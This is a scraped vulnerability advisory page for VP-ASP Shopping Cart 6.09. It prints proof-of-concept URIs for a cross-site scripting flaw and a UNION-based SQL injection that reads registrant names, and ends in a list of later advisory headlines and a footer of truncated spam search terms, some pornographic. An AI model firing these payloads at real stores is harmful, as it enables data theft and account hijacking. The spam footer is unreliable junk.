exploits , vulnerabilities , articles , VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities

Title	VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
Published	2007-01-11-12:00AM
Updated	2007-01-12-05:50PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	ajann is credited with the discovery of these vulnerabilities.
Vulnerable	VPASP Shopping Cart 6.09
Not Vulnerable
Code	To exploit a cross-site scritping issue: An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI. The following proof-of-concept URI is available: http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E To exploit an SQL-injection issue: An attacker can exploit this issue via a web client. The following proof-of-concept URI is available: http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability
2009-12-14 Google Chrome DNS Pre-Fetching Proxy Cache Information Disclosure Vulnerability
2009-12-14 Oracle E-Business Suite Multiple Remote Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 00:40:46 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
analsex.co blue filim shejipeixu www.tuve8. Cisco Cata www.sakila ProFTP FULSEX php includ news for c PHP Advanc porn anels www.sex100 Www.thrish hand job 700 xxx ////////co Sexfotos iis exploi news for C maxcpm.inf Sex girs entry p...3Fopti www lalats php-nuke 2 _____ ___ www.ftv sw news for C vaps.de socalcoeds Prnerotic arab sex v School sex lineage Sn@per usa SEX www.sexyfu videosexo arab sex v news for c SOUTH www.chuang www.backch www.pc139. PHP guestb www.bbgxxw apache 1.3 www.lscsdl sage